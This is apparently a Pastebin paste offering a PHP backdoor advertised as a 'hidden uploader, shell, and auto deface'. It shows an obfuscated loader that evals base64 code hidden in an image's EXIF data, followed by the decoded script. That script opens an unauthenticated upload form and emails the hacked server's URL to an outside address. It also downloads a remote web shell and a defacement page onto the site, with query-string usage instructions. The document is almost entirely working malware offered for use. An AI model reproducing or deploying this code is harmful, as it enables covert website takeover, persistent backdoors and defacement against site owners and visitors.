Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- decoder : sohai
- contact me: sohai@hacker-newbie.org
- desript : hidden uploader,shell, and auto deface.
- ->how to use : test.php?0upload = hidden uploader
- - : test.php?0shell = hidden shell
- test.php?0deface = auto deface.
- sample encode :
- <?php
- $BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
- eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
- ?>
- decode:
- <?php
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- @error_reporting(0);
- $up = " <html> <head><title> -= Syedich =- </title></head><body><center><h1><font face=\"Tahoma\" size=\"5\" color=\"#ff0000\">Learn To Better</font></h1><form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"><table border=\"1\"><tr><td bgcolor=\"#000000\"><font color=\"#00ff00\"><input type=\"file\" name=\"file\" size=\"50\"><td bgcolor=\"#000000\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload File\"></td></td></tr></table></form></center></body>";
- if( $_POST['_upl'] == "Upload File" ) {
- if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
- echo '<b><center>
- <font face=\"Tahoma\" size=\"5\" color=\"#ff0000\">SUKSES UPLOAD MASTAH !!</center></b>';
- }
- else {
- echo '
- <font face=\"Tahoma\" size=\"5\" color=\"#ff0000\"><center><b>GAGAL UPLOAD MASTAH !</b>';
- }
- }
- if(isset($_GET["0upload"])){
- echo "$up";
- }
- /////////////////////////////
- if(isset($_GET["0cek"])){
- echo "Password E :".$auth_pass;
- }
- /////////////////////////////
- if (file_exists('.db'))
- { } else {
- $to = "syedich@yahoo.com";
- $subject = $_SERVER['SERVER_NAME'];
- $header = "From: Mastah <jancok@matamucok.com>";
- $message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
- mail($to, $subject, $message, $header);
- $m = fopen(".db", "w") or die (" ");
- $txt = "";
- fwrite($m, $txt);
- fclose($m);
- chmod(".db",0644); }
- /////////////////////////////
- if(isset($_GET["0shell"])){
- $anak1 = file_get_contents("https://sites.google.com/site/bhshll123/bh.txt");
- $nggawe1 = fopen("themes.php","w") or die ("gabisa pak");
- fwrite($nggawe1,$anak1);
- fclose($nggawe1);
- header ("Location:themes.php");
- chmod("themes.php",0644);}
- //////////////////////////////
- if(isset($_GET["0deface"])){
- $anak = file_get_contents("http://pastebin.com/raw/6JA72K8m");
- $nggawe = fopen("0x.htm","w") or die ("gabisa pak");
- fwrite($nggawe,$anak);
- fclose($nggawe);
- header ("Location:0x.htm");}
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement